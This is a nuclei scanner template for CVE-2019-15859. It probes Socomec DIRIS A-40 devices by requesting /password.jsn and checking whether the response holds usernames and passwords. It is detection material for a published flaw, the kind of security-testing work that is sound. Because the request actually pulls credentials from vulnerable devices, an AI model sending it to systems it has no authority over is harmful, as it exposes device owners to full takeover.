nuclei-templates/cves/2019/CVE-2019-15859.yaml

31 lines
771 B
YAML

id: CVE-2019-15859
info:
name: Socomec DIRIS Password Disclosure
author: geeknik
description: Password disclosure in the web interface on socomec DIRIS A-40 devices before 48250501 allows a remote attacker to get full access to a device via the /password.jsn URI.
reference: https://seclists.org/fulldisclosure/2019/Oct/10
severity: critical
tags: cve,cve2019,disclosure,socomec,diris,iot
requests:
- method: GET
path:
- "{{BaseURL}}/password.jsn"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "text/json"
part: header
- type: word
words:
- "username"
- "password"
part: body
condition: and